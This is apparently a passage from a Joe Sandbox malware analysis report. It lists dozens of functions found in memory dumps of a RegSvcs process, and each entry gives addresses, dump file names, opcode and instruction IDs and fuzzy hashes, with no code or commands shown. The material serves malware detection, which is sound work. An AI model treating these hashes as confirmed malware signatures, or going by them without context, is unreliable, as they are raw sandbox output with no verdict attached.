Function 00450D91, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591dee85b18990d4514d022783272f9e6f44565c8134cc7da55b3854c74863ec
Instruction ID: f38fd753dcadb74bf51dd011007ed85e47b5b1a520859e9f97c995fb26403bd4
Opcode Fuzzy Hash: 591dee85b18990d4514d022783272f9e6f44565c8134cc7da55b3854c74863ec
Instruction Fuzzy Hash: B501F5352011458FDB449B74D448A5C7BA1FF84326B6044AAF9428B16BDF74984DD705

Uniqueness

Uniqueness Score: -1.00%

Function 00451251, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdce3d87899a266f90addee7c784d0fbb838356bd136d5acdacd3409ca73a38
Instruction ID: 496adddd1c931026a785ecc9ea3f5e102bd57324b0bbdb4b7c2c4a4c756124c5
Opcode Fuzzy Hash: 8bdce3d87899a266f90addee7c784d0fbb838356bd136d5acdacd3409ca73a38
Instruction Fuzzy Hash: 73015E353041508FC748AB38D058A697BE6AF86705B2541EFE406DB677CBB59C0A8786

Uniqueness

Uniqueness Score: -1.00%

Function 00457E92, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615c43dc30fbf2185ed01f3d4d2c6109cf67daa5dc72c4995f01d71e72196919
Instruction ID: f401411eca6e59812370ac945d53150b287cd166156e5afdd4f6913859b12bae
Opcode Fuzzy Hash: 615c43dc30fbf2185ed01f3d4d2c6109cf67daa5dc72c4995f01d71e72196919
Instruction Fuzzy Hash: E601923160D3489FDB25CA249455ABFBBA29B84301F2448BFC80397752CB795D0BD796

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE60, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c002e1d17a0d3a7b97990dcab4575f1963401757672c3cde549809daacac355f
Instruction ID: d33796e33849adbd48bd23a69c3ce6ec28d8e8f4c9ff2ea0a8a65e28c4a760de
Opcode Fuzzy Hash: c002e1d17a0d3a7b97990dcab4575f1963401757672c3cde549809daacac355f
Instruction Fuzzy Hash: D8018472E002198FDB50EBB9A80679EB7F4EB44615F10417BDA08E3245EB345919CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 004548E0, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d533912d8a492e91eed67dde06e2bb2ae943ff3071d05f01c0fb701eec720a
Instruction ID: 144fcf5255c06b944e80135d343430e4faec097978d0359ea0d8bc94d2ca5949
Opcode Fuzzy Hash: e6d533912d8a492e91eed67dde06e2bb2ae943ff3071d05f01c0fb701eec720a
Instruction Fuzzy Hash: DC016771F0011A8FCB55EFB884116EF76E6EBD9340F10443ED509D7245EB35494697D1

Uniqueness

Uniqueness Score: -1.00%

Function 004505C8, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a4c6bb1b232ce5295422bc9fc4bec16f69cc079f7004904e72c6e6f7520d01
Instruction ID: c15ece1828d5dd4f909c103b360bf872c250e6cfa3399778a19607d5e8bf376f
Opcode Fuzzy Hash: d9a4c6bb1b232ce5295422bc9fc4bec16f69cc079f7004904e72c6e6f7520d01
Instruction Fuzzy Hash: 34F0B4313201244BCA497A7D441167F228B9FD5B50764803EF006EB395CE78AC0353EE

Uniqueness

Uniqueness Score: -1.00%

Function 00456F10, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56e26921322bb40748da8850573160782560a6c2c91b89af577d0b554aca999
Instruction ID: a7849192ff26ad2950d4e6fe7fa5587aa1cd7b424e62d01a46c0c700169287ec
Opcode Fuzzy Hash: f56e26921322bb40748da8850573160782560a6c2c91b89af577d0b554aca999
Instruction Fuzzy Hash: F9018F72F006098FDB90EA79A8457AEB7F4EB84369F50017BD908E3282E7309945CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00455F12, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715559c95898af53861c9bf265fa74f22e3cc359050e8b93f63381dc8769287a
Instruction ID: 64f1759dd97340d69a61746240b0ee2e848c49797cb1e44b3e4e0fc0861f5e1f
Opcode Fuzzy Hash: 715559c95898af53861c9bf265fa74f22e3cc359050e8b93f63381dc8769287a
Instruction Fuzzy Hash: 5701F26260D7E00ECB13177A18340797FA04F93A0A71A45DFD88ACF193EA294809C77B

Uniqueness

Uniqueness Score: -1.00%

Function 0045AFD0, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e2147c8bc3fe40d3041651086f8f8cf09530712438d40a3bd3f860afc78c38
Instruction ID: e6078245ae2315307bb14a0bb3428c09a266a55b0f12917646dad312ef683d61
Opcode Fuzzy Hash: e5e2147c8bc3fe40d3041651086f8f8cf09530712438d40a3bd3f860afc78c38
Instruction Fuzzy Hash: B401F230304244DFC705BB30E4155697BE2EF9570531544BED80ADB2A6EF358D0AEB9A

Uniqueness

Uniqueness Score: -1.00%

Function 005607FC, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671530655.0000000000560000.00000040.00000040.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079e5b97b5247e5f778fe1b84120c37db4c31be0c2cffdb31022ab9c05671dff
Instruction ID: bfc9d9318347f1d5404609b63470465ab07faeec70fccf50469eb920a306ffbf
Opcode Fuzzy Hash: 079e5b97b5247e5f778fe1b84120c37db4c31be0c2cffdb31022ab9c05671dff
Instruction Fuzzy Hash: DBF0A9765097805FD7118B05AC40862FFA8DA86630709C0AFEC4D8B612D125B904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00451260, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35ada4aaebc3dc6f5fffef556c0aea0cf55abb595aeb984a65b8310e7716ea4
Instruction ID: 8d0604bc84a417ba2684e7a47fa997790bbc7b21e6e58bdbea537d6b28ce468c
Opcode Fuzzy Hash: a35ada4aaebc3dc6f5fffef556c0aea0cf55abb595aeb984a65b8310e7716ea4
Instruction Fuzzy Hash: 570181343000108BC748AB28D058A2977EAAFC9715B2041EBF906DB776CFB59C0A8B86

Uniqueness

Uniqueness Score: -1.00%

Function 0045ADC9, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5551217df07ab6b69480b26a5b52eeead7b0fb0ceafd5c74e0d497868f03e63e
Instruction ID: 1663ca2f7aef87a807a732e34ea5e46d2df6bdeabcc86297428e97a20165b3c8
Opcode Fuzzy Hash: 5551217df07ab6b69480b26a5b52eeead7b0fb0ceafd5c74e0d497868f03e63e
Instruction Fuzzy Hash: 2FF0A435B412169BEF08FFB0D982B9EB365BF84704F108959E501AB349DF709D128BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00455E80, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e745e9066624fa8bf49b2ab95e81a40523c36de7f028a569c1cf080b78322f
Instruction ID: 756f1fa3758487f6857412b02e480faeee68bead5903d00b5299a1f7fe7e5650
Opcode Fuzzy Hash: e5e745e9066624fa8bf49b2ab95e81a40523c36de7f028a569c1cf080b78322f
Instruction Fuzzy Hash: A5F0C272E042054FCB50EB79980529FBBE5AB8A264F55007AC508E3202EA389A02CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0045AFE0, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b68ad803d62ed067bf8b0d557d0fe80350917aae47f49e7049dd3fb9fb8d7b
Instruction ID: 09b87e11126aad5ab2fad96c61c0b71ea42397bb395d78c65e1e938a094f1e43
Opcode Fuzzy Hash: 14b68ad803d62ed067bf8b0d557d0fe80350917aae47f49e7049dd3fb9fb8d7b
Instruction Fuzzy Hash: 06F0FF30200604CBC704BB74E40956AB7E2EF94705320847EE80ADB269EF329C0ADB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00456878, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0243cbb229720d2ebd9de56d2531e2f8f5615fef4147dd69c8c111801f022e88
Instruction ID: 34042369292f09a98b7bd5b1682ea7aed4ccefbc4a37991dce6c131403a2641c
Opcode Fuzzy Hash: 0243cbb229720d2ebd9de56d2531e2f8f5615fef4147dd69c8c111801f022e88
Instruction Fuzzy Hash: 53F05930B0911597AF10622598105BF73A58786392F91007BCE06A7386EF3C5E0E93EB

Uniqueness

Uniqueness Score: -1.00%

Function 00450D77, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f8830d507034565dfb554b8abbfd08d0c09756e99bf190c34f2a1d5e539044
Instruction ID: 7a540dafadf6aad9b83aa426a4d14a78e64b8e22efe6a2186b88c1782c2d75c3
Opcode Fuzzy Hash: 98f8830d507034565dfb554b8abbfd08d0c09756e99bf190c34f2a1d5e539044
Instruction Fuzzy Hash: AD013C35305100CFCB44EB78D498A597BE2EF89315B2084AAE406CB776CB75DC49DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00560A54, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671530655.0000000000560000.00000040.00000040.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb31ddcc1e261ba4a9a56e6176b9b0ad2f349136c69ca36a55ba433cf8a6e1f
Instruction ID: eba1061b821e837f4766e9ab0884fb3ff69e16147a3b4a73666983d6437a07ae
Opcode Fuzzy Hash: fdb31ddcc1e261ba4a9a56e6176b9b0ad2f349136c69ca36a55ba433cf8a6e1f
Instruction Fuzzy Hash: 8B01003410D3808FC707CB50D954B15BFB1BB86318F29C6DAE8894B6A3C7369816DB52

Uniqueness

Uniqueness Score: -1.00%

Function 004588A8, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3d0f22072eb510e75272adba16ae3f00e505c12b9b8756281ea2d9d0cbeff6
Instruction ID: 13e9c1eccdd35a1ca858d3c7a006c49bb6d2aecd62c34208210d078a903ae663
Opcode Fuzzy Hash: 1d3d0f22072eb510e75272adba16ae3f00e505c12b9b8756281ea2d9d0cbeff6
Instruction Fuzzy Hash: 51F0C275A09244DEC7019B7498418BF7FB0EF9530176445ABD902EB213DE74450AD757

Uniqueness

Uniqueness Score: -1.00%

Function 0045EE38, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8029661f119811a34b93bcf4226fc921ce280910e3b6eacae45cb34873682de
Instruction ID: ad58907d6e808c58214c1e292e6e81124470a54187a0ae8f2fdfe63c75e57fa1
Opcode Fuzzy Hash: a8029661f119811a34b93bcf4226fc921ce280910e3b6eacae45cb34873682de
Instruction Fuzzy Hash: A8F0E9A391D3904BEB39022A18D5BAA6B544752722F1541BBCC4B87283C14C0D0ED36B

Uniqueness

Uniqueness Score: -1.00%

Function 00450918, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38329a6b7f6b5d2bd05f7bbfcbec82602bbef4e22788be5d4eb22d814158683
Instruction ID: a44f83a4a146cdf36511a8b9efb15131b568dc96670e8e2ade8a1be65d3ae55e
Opcode Fuzzy Hash: f38329a6b7f6b5d2bd05f7bbfcbec82602bbef4e22788be5d4eb22d814158683
Instruction Fuzzy Hash: CEE0553AE052088B9B505AF19C541EBB7A9D780752F100423DD03D3207EA78580A91C3

Uniqueness

Uniqueness Score: -1.00%

Function 00455788, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade9975ed78a328724b86365f71b1f405bffe114b878e2e1a85f6f80f3730465
Instruction ID: ea4f7740d94dec2c3714762646e91cdc5cbb47d77e1621d747f105ffea2f8c01
Opcode Fuzzy Hash: ade9975ed78a328724b86365f71b1f405bffe114b878e2e1a85f6f80f3730465
Instruction Fuzzy Hash: 55E02233B002881B9F014539AC5A1EFBBAACBC8324F04407FDA04E7242EE21581682E0

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC83, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04780937ee499091f4cb765d5c908ef1ef7eb4305c1144ae403b32cda83fdae
Instruction ID: 94f079b33e4edb0e8c5b336dc1a44980d6ccecdc812cd28c43cd37124b1d7554
Opcode Fuzzy Hash: b04780937ee499091f4cb765d5c908ef1ef7eb4305c1144ae403b32cda83fdae
Instruction Fuzzy Hash: 90E06D327041212F1259666A541152F769ADBC6B62329812BF809E7742CF269C0793EE

Uniqueness

Uniqueness Score: -1.00%

Function 0045B590, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b684dd057af31cf3c8b5f8be94c6eec2427b7c9412067fb5441cb8110065cbf
Instruction ID: d3de0ff2ca90003f64238cc3ce737d702f5031b194a29bc9e4147320fa376e67
Opcode Fuzzy Hash: 4b684dd057af31cf3c8b5f8be94c6eec2427b7c9412067fb5441cb8110065cbf
Instruction Fuzzy Hash: 54F027316057540FC33A8B1A9400453FBF5ADD1321308866FD049C3512D3B458098BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00560B60, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671530655.0000000000560000.00000040.00000040.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e03cee4f52f3d8ecd26d957885d3b229b057721131c4757f3198f3f6096444
Instruction ID: 40cb543f38ee34f69024c9cd2fa09335bc33436da87f32fdd3db50657b95a5ec
Opcode Fuzzy Hash: 92e03cee4f52f3d8ecd26d957885d3b229b057721131c4757f3198f3f6096444
Instruction Fuzzy Hash: 1BF01D35144644DFC306CF50D540B16FBA2FB89718F24C6ADE9491B762C737E813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 0045CFD6, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 116b88a0e42b3866a44b0b0c34a02ba9cc672611157fd6c9e00307eb8ec50c25
Instruction ID: 29389b675330be9a620771d69aedeb5ac58e242628775841a7777497ade7461a
Opcode Fuzzy Hash: 116b88a0e42b3866a44b0b0c34a02ba9cc672611157fd6c9e00307eb8ec50c25
Instruction Fuzzy Hash: 57E02B233092409F87125279441046D776BDEC562633C80ABE907CF293CD2A8C0B939B

Uniqueness

Uniqueness Score: -1.00%

Function 0045C1E8, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fac292dc2d6c6f703ef44a737ce1612343f6d82e4e337bfbb40183fe34cd8f8
Instruction ID: 56771f393deb9f1d78b4794637c2ed9867a1fc367b3519c363b767336c9d31c2
Opcode Fuzzy Hash: 2fac292dc2d6c6f703ef44a737ce1612343f6d82e4e337bfbb40183fe34cd8f8
Instruction Fuzzy Hash: 7AF06235604B409FC320DF59D540806FBF5EF857203158A9FE9AA87A66C330F809CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0045784A, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c37d52ba793aeac77ed519c02fc1a90541eb17748d478a581b432166befe37e
Instruction ID: 0417fe855ee147cc5ef801dedd9404a47897f9e3c155357c1fb83cd7dbced939
Opcode Fuzzy Hash: 7c37d52ba793aeac77ed519c02fc1a90541eb17748d478a581b432166befe37e
Instruction Fuzzy Hash: 03E02B347051204BEA04B3FA94213ED63864FC1A1AF40443BDC05EB7C3DF684C0A87E6

Uniqueness

Uniqueness Score: -1.00%

Function 00455952, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a771b6d96cd6946c6f79288bf10bcd73816989efb13df69eb77f711bda0f24
Instruction ID: f0d62d602108f32ed9367fd1b7051fea7dff6d52bfba86313ecafae697e09908
Opcode Fuzzy Hash: 57a771b6d96cd6946c6f79288bf10bcd73816989efb13df69eb77f711bda0f24
Instruction Fuzzy Hash: F1F02730B04400CFDF04ABB4E4252BC7352AF803667104077E80697186DF784C169796

Uniqueness

Uniqueness Score: -1.00%

Function 0056081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671530655.0000000000560000.00000040.00000040.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca708b8a76f5a25ebe2b7b35911880ce50910f9958edd211a8a690b857cf309
Instruction ID: b1c60a1b128c37af3777da9a41752fc2d51cb81f79cd5b6297da910ab8bb2518
Opcode Fuzzy Hash: 4ca708b8a76f5a25ebe2b7b35911880ce50910f9958edd211a8a690b857cf309
Instruction Fuzzy Hash: 7EE092766017008BD650CF0AFC41462F7D4EB84A30B48C07FDC0D8B700E136B505CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00456818, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42f786cf3c4105f3b650339d9ca94525fa81ec10bbd1d40470f8198a5616a64
Instruction ID: e22a9200c6bc8685e8330537d6766fe9cef51fc3e9720480ded9d0d21809e3e0
Opcode Fuzzy Hash: a42f786cf3c4105f3b650339d9ca94525fa81ec10bbd1d40470f8198a5616a64
Instruction Fuzzy Hash: 37E0927150E6448FE70137B858252A63B54DF43386B5A00DBDD06CB2A3DB598C5E836B

Uniqueness

Uniqueness Score: -1.00%

Function 0019AF0F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671227359.0000000000192000.00000040.00000001.sdmp, Offset: 00192000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_192000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22012b46b4d961733cff19785c56c73c796922a80a2a3b37259884e72f73d9e1
Instruction ID: 6e9196dc3c55b8c0ab6bfe547f63ecf8e12367a9cc110e5089815508c5468d4d
Opcode Fuzzy Hash: 22012b46b4d961733cff19785c56c73c796922a80a2a3b37259884e72f73d9e1
Instruction Fuzzy Hash: FBE0487264170467E2508E069C46F62FB98EB54A30F48C567EE0D5B701E176B514CAF5

Uniqueness

Uniqueness Score: -1.00%

Function 00454800, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf911993656f27cb2e2515a036f4538d083ef921c4a0df55497bfc61f9468235
Instruction ID: f6c98734ab9ae47c9a044d81849e2d430116b7395232639b6e4c65aa8c07f45a
Opcode Fuzzy Hash: bf911993656f27cb2e2515a036f4538d083ef921c4a0df55497bfc61f9468235
Instruction Fuzzy Hash: BCE08C3170005497CB0476B9B4082AE7689BFD475AB2050ABF90ACFA52EA2ADC4657CB

Uniqueness

Uniqueness Score: -1.00%

Function 0045B540, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9f91fafb0b156a393d491aed599e89e973113982ed8885065a2b4e3cb144c6
Instruction ID: 9b387f14e3cfff30cd912f77c8072844af3ed0745022d866d81917b6a04ad4d8
Opcode Fuzzy Hash: da9f91fafb0b156a393d491aed599e89e973113982ed8885065a2b4e3cb144c6
Instruction Fuzzy Hash: EDF03030500644DBC3588E59D280292B3E5FF4579ABA4482FE447C7E21E376E885CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0045E590, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579a8cf049d4a9f41239f8707dd85754c49f2d3e2df47bd1c2726bc788c63a83
Instruction ID: 31f588b8b68b1924eaf74bc2ac90b0bc4ea57beb1e61489753ac9591aabe95f3
Opcode Fuzzy Hash: 579a8cf049d4a9f41239f8707dd85754c49f2d3e2df47bd1c2726bc788c63a83
Instruction Fuzzy Hash: 17E0D831300204978718D69AD42056AB399CBC4725314883EE50E87301FF67DD0647D1

Uniqueness

Uniqueness Score: -1.00%

Function 004562B1, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e035e7e6269668926d64e20094021ea2a09c054e73d34bf6db823bd7fcdc6bd
Instruction ID: 11f589cd619e09b74d4a8a235fcdd222cdc34eea1222d2762b4d1c92cf0324bc
Opcode Fuzzy Hash: 8e035e7e6269668926d64e20094021ea2a09c054e73d34bf6db823bd7fcdc6bd
Instruction Fuzzy Hash: 2EE026627052941FEF067778581157E1B596FB3A11306049FE402DB283CD294C0983A9

Uniqueness

Uniqueness Score: -1.00%

Function 0045CFE8, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d403d77e60af6a335d5998433018aee3a9a5b02a055a4a5aa76dd6ba858d388
Instruction ID: 174b42acd29daf7ac5c1ec777e9b9cb1f986c5085a38bc074faac0435faf6b92
Opcode Fuzzy Hash: 1d403d77e60af6a335d5998433018aee3a9a5b02a055a4a5aa76dd6ba858d388
Instruction Fuzzy Hash: 84E0C222318110CF4615669D441187D728BCEC8B27328402BF907CB392DE6A9C0B63DF

Uniqueness

Uniqueness Score: -1.00%

Function 00455F98, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f443525e55a0c156a471f94bfe4582c6678acca828e30be589986d8d1e182a80
Instruction ID: 712da0e2fde9ee04584be7491e11895cc23dad793507935474fdd4a0fcf962ae
Opcode Fuzzy Hash: f443525e55a0c156a471f94bfe4582c6678acca828e30be589986d8d1e182a80
